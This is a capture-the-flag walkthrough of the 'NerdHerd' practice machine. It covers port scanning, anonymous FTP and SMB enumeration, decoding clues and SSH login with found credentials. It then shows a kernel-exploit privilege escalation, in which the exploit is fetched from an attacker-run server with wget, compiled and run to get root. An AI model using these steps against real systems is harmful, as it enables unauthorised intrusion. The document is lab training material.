In this post, i would like to share a walkthrough of NerdHerd Room.


This room has been considered difficulty rated as MEDIUM machine


Let’s Start!


We need to deploy the machine for us to play with the machine


Once the machine is fully up within 3 minutes, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN


There are multiple ports that been open but the crucial port that caught my attention

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 7.2p2
  • 339: netbios-ssn Samba smbd 3.x -4.x
  • 445: netbios-ssn Samba smbd 4.3.11-Ubuntu

I notice that ftp can be accessed via anonymous privileges.


I found a folder “pub” which contain youfoundme.png file. We will need to get the file by running get youfoundme.png


When I execute the command ls -al and I notice there are a folder .jokesonyou. When I access the folder, there is a file called hellon3rd.txt by running get hellon3rd.txt


Let’s investigate the hellon3rd.txt by using cat function


For the Png file, we need to analyse the file by using

Exiftool the file on NerdHerd Room

exiftool youfoundme.png


What have caught my attention is that the owner’s name looks suspicious


The result shown as below


There’s nothing more that we can use. Let’s enumerate it deeper.

Enumerate with nmap tool


Therefore, let’s run dirb to enumerate the website directory that I can work with


Let’s jump into the website <IP Address>:1337 while we are waiting for dirb to come back to us with the result. The website interface show that it has been compromised.

Apache Default page on NerdHerd Room


I do think it was real for a second there. So, let’s search that “something” by reading the source code of the website.


Nothing for now but let’s scroll down just in case we find something interesting


There’s a YouTube link appears there. Let’s click the link and see what’s stored there.


The link has been re-direct to an old song that can be useful for us later.


Let’s study the lyrics of the song

Analyze using CyberChef with the NerdHerd Room


Let’s use those hint to decode the phrase “fijbxslz” with CyberChef


Firstly, I will use bird as the key and the output is not fully cracked


Let’s continue typing the key as birdistheworld and we got easypass


The result shown that we got /admin/ directory. Let’s see the website directory


Nothing that we can see over here. Let’s open the source code and look into anything that might help to us.


Wow, we got that information that able to use it later


For us to get the right output, we will need to use recipe base64 decode


So far, we manage to get those hints that will be useful

  • easypasss
  • cibartowski
  • hehegou<.jÇ].[ÝD

From the nmap output before, we notice that port 445 have opened. Let’s use smbclient -L <IP Address>

SMBclient enumeration on NerdHerd Room


Oh wow, we notice nerdherd_classified as the Sharename. However, we don’t have the username for the smbclient.


Let’s run enum4linux <IP Address>

Enum4linux enumeration


I found out “chuck” was one of the usernames available.


Let’s straight jump into it.


Let’s access the nerdherd_classified file by typing smbclient //<IP Address>/nerdherd_classified -U chuck


For the password, we can try using one of the hints that we just received


Finally, we have successfully login to the smb


While roaming the smb, i found out secr3t.txt is been stored over there


Let’s download the file by using get secr3t.txt


I found out there’s another directory that we can try investigate it.


Oh wow! We got creds.txt while surfing the website


We got the chuck’s SSH credentials. So, let’s SSH to the server using chuck’s credentials

SSH access via chuck’s credential


We found the user.txt


Let’s read the user.txt by using cat user.txt


Let’s enumerate the server to find any SUID exploit in order to gains root privileges


I found a dead-end while doing the command above.


Let’s check the Linux Kernel by using uname -a


Let’s do some research on the Linux Kernel Exploit


I found the vulnerabilities as shown above and let’s download the exploit into our machine.


Let’s transfer the exploit into the target’s machine by starting the listener like python3 -m http.server


On the target’s machine, we need to download using wget http://<Attacker’s IP>/<exploit>


Let’s check whether gcc is been installed in the target’s machine


Let’s compiled the exploit as shown below:

  • gcc <exploit> -o exploit
  • chmod +x exploit

Next, we can run the exploit by using ./exploit


We can turn to shell by execute bash -i


Let’s access /root directory and read the root.txt but unfortunately it’s not that easy at all


We need to locate the another root.txt file and i notice there’s another locations.


We need to access the /opt/ directory and cat .root.txt


Wuhuu! Now, we got the root flag.


For the challenges, there still have a bonus flag that we need to retrieve


Firstly, let use find functions and we got nothing over there.


I give up on getting the bonus flag. Let’s cheat for this by reading the Question Hint where it says “bring back so many memories”


On the root directory, there’s a .bash_history file and let’s us read the file by execute cat .bash_history


Let’s keep scroll down the file. While reading the file, i notice there’s bonus flag mention there


-The End-


Happy Learning Guys!